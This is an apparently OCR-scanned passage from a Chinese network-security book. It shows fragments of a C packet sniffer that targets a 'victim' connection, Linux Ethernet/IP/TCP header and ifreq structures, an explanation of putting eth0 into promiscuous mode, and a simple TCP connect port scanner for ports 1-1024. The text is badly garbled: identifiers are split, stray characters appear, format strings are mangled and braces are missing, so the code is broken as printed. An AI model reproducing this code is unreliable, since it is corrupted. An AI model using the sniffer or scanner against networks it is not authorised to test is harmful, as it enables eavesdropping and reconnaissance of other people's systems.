static char blah[ 1024]; 
struct in addr i; 
struct hostent * he; 


i.s_addr = in; 
he = gethostbyaddr( (char * )&i, sizeof(struct in addr),AF_ INET); 
if(he == NULL) 
strcpy(blah, inet_ntoa(i)); 
else 
strcpy(blah, he 一 > h_name); 


return blah; 


} 


void clear victim(void) 
{ 
victim. saddr = 0; 
victim. daddr = 0; 
victim. sport = 0; 
Victim. dport = 0; 
victim.active = 0; 
victim. bytes_read= 0; 
Victim. start time= 0; 
/* cleanup: 程序 退出 等 事件 时 ,在 文件 中 作 一 个 记录 ,并 关闭 文件 * / 
void cleanup(int sig) 
{ 
fprintf(fp, "Exiting...\n"); 
close(s); 
fclose( fp); 
exit(0); 
} 


在 上 述 程 序 中 ,结构 etherpacket 定义 了 一 个 数据 包 。 其 中 的 ethhdr、iphdr 和 tcphdr 
3 个 结构 用 来 定义 以 太 网 帧 ,IP 数据 包头 和 TCP 数据 包头 的 格式 。 
它们 在 头 文件 中 的 定义 如 下 : 
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struct ethhdr 
unsigned char h dest[ETH ALEN]; /x destination eth addr */ 
unsigned char h_source[ETH ALEN]; /x source ether addr */ 
unsigned short h proto; /* packet type ID field */ 
}; 
struct iphdr 
{ 
#if __BYTE ORDER == __LITILE ENDIAN 


uint8 t ihl:4; 
u_ int8 t version:4; 
#elif _BYTE OI == __BIG ENDIAN 
u_int8_t version:4; 
uint8 t ihl:4; 
#else 
#error "Please fix < bytesex. h>" 
#endif 
u_int8_t tos; 
u_int16 _t tot_len; 
u_int16 t id; 
u_int16_t frag_off; 
u int8 t ttl; 
u_int8_t protocol; 
u_int16_t check; 
u_int32_t saddr; 
u_int32_t daddr; 
/ * The options start here. */ 
}; 
struct tcphdr 
{ 
u_int16_t source; 
u_int16_t dest; 
uint32_t seq; 
u_int32_t ack_seq; 
#3if __BYTE ORDER == __LITTLE ENDIAN 
u_int16 t resl:4; 
u_ int16 t doff:4; 
u_int16_t fin:1; 
u_int16_t syn:1; 
u int16 t rst:1; 
u_int16_t psh:1; 
u_int16 t ack:1; 
u_int16 t urg:1; 
u_int16 t res2:2; 
#elif __BYTE ORDER == __BIG ENDIAN 
u int16 t doff:4; 
uint16 t resl:4; 
u_int16 t res2:2; 
u_int16 t urg:1; 
uint16 t ack:1; 
u_int16 t psh:1; 
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u_int16 t rst:1; 
u_int16 t syn:1; 
uint16 t fin:1; 

#else 

#error "Adjust your < bits/endian. h> defines" 

#endif 

u_int16_t window; 

u_int16_t check; 

u_int16 t urg ptr; 
}; 
struct ifreq 

{ 

# define IFHWADDRLEN 6 
# define IFNAMSIZ 16 
union 
{ 
char ifrn name[ IFNAMSIZ]; /x Interface name, e.g. "en0" */ 
} ifr_ifrn; 
union 
{ 
struct sockaddr ifru addr; 
struct sockaddr ifru dstaddr; 
struct sockaddr ifru broadaddr; 
struct sockaddr ifru netmask; 
struct sockaddr ifru_hwaddr; 
short int ifru flags; 
int ifru_ivalue; 
int ifru mtu; 
struct ifmap ifru map; 
char ifru slave[ IFNAMSIZ]; /x Just fits the size */ 
__caddr t ifru data; 
} ifr_ifru; 

}; 

接口 请 求 结构 在 调用 输入 输出 时 使 用 。 所 有 的 1/O 接口 输出 必须 有 一 个 参数 ,这 个 参 
数 以 ifr_name 开头 ,后 面 的 参数 根据 使 用 不 同 的 网 络 接口 而 不 同 。 

使 用 命令 ifconfig 可 以 查看 计算 机 的 网 络 接口 。 一 般 有 两 个 接口 lo0 和 eth0。 在 ifreq 
结构 中 ,各 个 域 的 含义 与 ifconfig 的 输出 是 一 一 对 应 的 。 这 里 ,程序 将 etho 作为 ifr_name 
来 使 用 。 接 着 ,该 函数 将 这 个 网 络 接口 设置 成 promiscuous 模式 。Sniffer 工作 在 这 种 模 
式 下 。 

函数 read_tcp 的 作用 是 读 取 TCP 数据 包 , 传 给 filter 处 理 。filter 函数 对 上 述 读 取 的 数 
据 包 进行 处 理 。 

接 下 来 的 程序 是 将 数据 输出 到 文件 中 。 

函数 clearup 是 在 程序 退出 等 事件 时 在 文件 中 作 一 个 记录 ,并 关闭 文件 。 
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# include < stdio.h> 

# include < sys/socket.h> 
# include < netinet/in.h> 
# include < errno.h> 

井 include < netdb.h> 

# include < signal.h> 


int main( int argc, char #x argv) 
{ 

int probeport = 0; 

struct hostent * host; 

int err, i, net; 

struct sockaddr_in sa; 


if (argc != 2) { 
printf("usage: % s hostname\n", argv[0]); 
exit(1); 
/* 扫描 1 一 1024 端口 范围 */ 
for (i = 1; i<1024; i++) 
{ 
strncpy( (char * )&sa, "", sizeof sa); 
sa. sin family = AF_INET; 
if (isdigit( * argv[1])) /* 如 果 是 IP 地 址 */ 
sa. sin addr.s addr = inet addr(argv[1]); 
else if ((host = gethostbyname(argv[1])) != 0) /* 如 果 是 主机 名 ,需要 转换 * / 
strncpy( (char * )&sa. sin addr, (char * )host 一 > h addr, sizeof sa. sin addr); 
else{ 
herror(argv[1]); 
exit(2); 
} 
sa. sin port = htons(i); 
/* 创建 socket 标识 符 */ 
net = socket(AF_INET, SOCK_STREAM, 0); 
if (net <0) { 
perror("\nsocket"); 
exit(2); 
} 
/* 与 目的 方 连接 * / 
err = connect(net, (struct sockaddr * ) &sa, sizeof sa); 
if (err<0) { 
printf("%s 多 一 5d %s\r", argv[1], i, strerror(errno)); 
fflush( stdout); 
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} else{ 
/* 如 果 连 接 成 功 ,打印 主机 名 (或 地 址 ) 和 成 功 连接 的 端口 号 * / 
printf("%s % — 5daccepted. \n", argv[1], i); 
if (shutdown(net, 2) <0) { 
perror("\nshutdown" ); 
exit(2); 
} 
} 
/* 关闭 socket 标识 符 * / 
close(net) 
} 
printf(" \r"); 
fflush( stdout); 


return (0); 
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